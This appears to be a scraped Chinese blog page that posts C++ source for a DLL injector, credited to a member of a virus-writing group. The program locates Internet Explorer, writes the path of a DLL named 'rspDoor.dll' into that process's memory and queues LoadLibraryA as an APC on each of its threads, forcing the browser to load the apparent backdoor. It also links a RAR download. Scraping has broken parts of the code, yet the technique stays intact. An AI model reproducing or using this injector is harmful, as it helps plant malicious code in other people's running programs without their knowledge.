zoukankan      html  css  js  c++  java
  • QueueUserApc实现DLL注入的测试

    #include "stdafx.h"
    #define _WIN32_WINNT 0x0400
    #define WIN32_LEAN_AND_MEAN   // 从 Windows 头中排除极少使用的资料
    #include 
    <stdio.h>
    #include 
    <stdlib.h>
    #include 
    <windows.h>
    #include 
    <Tlhelp32.h>
    #include  
    <winbase.h>
    #pragma   comment  ( lib, "ws2_32.lib") 


    //
    // coded by robinh00d[VX Z0NE]
    // Email:robinh00d_at_qq_dot_com
    // 向指定进程的线程里插入APC实现DLL注入
    //思路来自PJF的老文
    //
    //typedef HANDLE (*OPENTHREAD) (DWORD dwFlag, BOOL bUnknow, DWORD dwThreadId); 
    typedef HANDLE (__stdcall *OPENTHREAD) (DWORD dwFlag, BOOL bUnknow, DWORD dwThreadId);
    typedef 
    struct _TIDLIST
    {
    DWORD dwTid ;
    _TIDLIST 
    *pNext ;
    }TIDLIST;

    DWORD EnumThread(HANDLE hProcess, TIDLIST 
    *pThreadIdList)
    {
        
    TIDLIST 
    *pCurrentTid = pThreadIdList ;

    const char szInjectModName[] = "C:\\rspDoor.dll" ;
    DWORD dwLen 
    = strlen(szInjectModName) ;

    PVOID param 
    = VirtualAllocEx(hProcess, \
             NULL, dwLen, MEM_COMMIT 
    | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE) ;

    if (param != NULL)
    {
       DWORD dwRet ;
       
    if (WriteProcessMemory(hProcess, param, (LPVOID)szInjectModName, dwLen, &dwRet))
       {

        
    while (pCurrentTid)
        {
            
            HMODULE hDll 
    = ::LoadLibrary("Kernel32.dll"); 
            OPENTHREAD lpfnOpenThread 
    = (OPENTHREAD)::GetProcAddress(hDll, "OpenThread"); 
          HANDLE hThread 
    = lpfnOpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid);

         
    if (hThread != NULL)
         {
          
    //
          
    // 注入DLL到指定进程
          
    //
          
          QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (unsigned 
    long)param);
         }

         printf(
    "TID:%d\n", pCurrentTid->dwTid) ;
         pCurrentTid 
    = pCurrentTid->pNext ;
        }
       }
    }
    return 0 ;
    }
    //////////////////////////////////////////
    //////////////////////////////////////////////////
    DWORD GetProcID(const char *szProcessName)
    {
    PROCESSENTRY32 pe32 
    = {0} ;
    pe32.dwSize 
    = sizeof(PROCESSENTRY32);

    HANDLE hSnapshot 
    = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) ;

    if (hSnapshot == INVALID_HANDLE_VALUE)
    {
       
    return 0xFFFFFFFF ;
    }

    if (!Process32First(hSnapshot, &pe32))
    {
       
    return 0xFFFFFFFF ;
    }

    do
    {
       
    if (!_strnicmp(szProcessName, pe32.szExeFile, strlen(szProcessName)))
       {
        printf(
    "%s的PID是:%d\n", pe32.szExeFile, pe32.th32ProcessID);
        
    return pe32.th32ProcessID ;
       }
    while(Process32Next(hSnapshot, &pe32));

    return 0xFFFFFFFF ;

    }
    ////////////////////////////////////
    ///////////////////////////////////////////////////////////
    TIDLIST* InsertTid(TIDLIST *pdwTidListHead, DWORD dwTid)
    {
    TIDLIST 
    *pCurrent = NULL ;
    TIDLIST 
    *pNewMember = NULL ;

    if (pdwTidListHead == NULL)
    {
       
    return NULL ;
    }
    pCurrent 
    = pdwTidListHead ;

    while (pCurrent != NULL)
    {

       
    if (pCurrent->pNext == NULL)
       {
        
    //
        
    // 定位到链表最后一个元素
        
    //
        pNewMember = (TIDLIST *)malloc(sizeof(TIDLIST)) ;

        
    if (pNewMember != NULL)
        {
         pNewMember
    ->dwTid = dwTid ;
         pNewMember
    ->pNext = NULL ;
         pCurrent
    ->pNext = pNewMember ;
         
    return pNewMember ;
        }
        
    else
        {
         
    return NULL ;
        }
       }
       pCurrent 
    = pCurrent->pNext ;
    }

    return NULL ;
    }

    int EnumThreadID(DWORD dwPID, TIDLIST *pdwTidList)
    {
    int i = 0 ;

    THREADENTRY32 te32 
    = {0} ;
    te32.dwSize
    = sizeof(THREADENTRY32) ;

    HANDLE hSnapshot 
    = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,dwPID) ;

    if(hSnapshot != INVALID_HANDLE_VALUE)
    {
       
    if(Thread32First(hSnapshot,&te32))
       {
        
    do
        {
         
    if(te32.th32OwnerProcessID==dwPID)
         {
          
    if (pdwTidList->dwTid == 0)
          {
           pdwTidList
    ->dwTid = te32.th32ThreadID ;
          }
          
    else
          {
           
    if (NULL == InsertTid(pdwTidList, te32.th32ThreadID))
           {
            printf(
    "插入失败!\n") ;
            
    return 0 ;
           }
          }
        
         }
        }
    while(Thread32Next(hSnapshot,&te32));
       }
    }
    return 1 ;
    }

    int main(int argc, char* argv[])
    {
    TIDLIST 
    *pTidHead = (TIDLIST *)malloc(sizeof(TIDLIST)) ;

    if (pTidHead == NULL)
    {
       
    return 1 ;
    }
    RtlZeroMemory(pTidHead, 
    sizeof(TIDLIST)) ;

    DWORD dwPID 
    = 0 ;

    if ((dwPID = GetProcID("iexplore.exe")) == 0xFFFFFFFF)
    {
       printf(
    "进程ID获取失败!\n") ;
       
    return 1 ;
    }

    //
    // 枚举线程ID
    //
    EnumThreadID(dwPID, pTidHead) ;

    HANDLE hProcess 
    = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID) ;

    if (hProcess == NULL)
    {
       
    return 1 ;
    }
    EnumThread(hProcess, pTidHead) ;

    return 0;
    }

    /Files/tt_mc/QUAinsert.rar

  • 相关阅读:
    Yslow的A评级指南
    Sqlserver 数据库自动备份
    他们如果什么也没有做,那将是我来世上的最大遗憾。
    规划人生
    安装程序无法复制一个或多个文件。特定错误码是0x4b8。
    Sqlserver数据库的恢复
    Android新手之旅(3) 信息的输出
    PDF开发控件
    通过快盘搭建自己的svn服务器
    Android新手之旅(2) 新手问题
  • 原文地址:https://www.cnblogs.com/tt_mc/p/1655178.html
Copyright © 2011-2022 走看看